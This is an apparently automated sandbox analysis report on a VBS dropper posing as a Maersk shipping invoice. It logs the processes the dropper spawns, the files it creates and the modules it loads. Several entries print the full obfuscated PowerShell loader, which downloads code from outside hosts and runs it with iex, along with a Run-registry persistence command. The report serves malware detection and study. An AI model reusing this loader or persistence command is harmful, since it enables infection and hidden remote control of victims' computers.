Classification label: mal100.troj.spyw.expl.evad.winVBS@17/10@4/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Scabrosely.Tor

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\jmoughoe-DMPW3B
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgmxergi.2iy.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4412
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6540

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Maersk_BL_Invoice_Packinglist.vbs	Virustotal: Detection: 12%
Source: Maersk_BL_Invoice_Packinglist.vbs	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
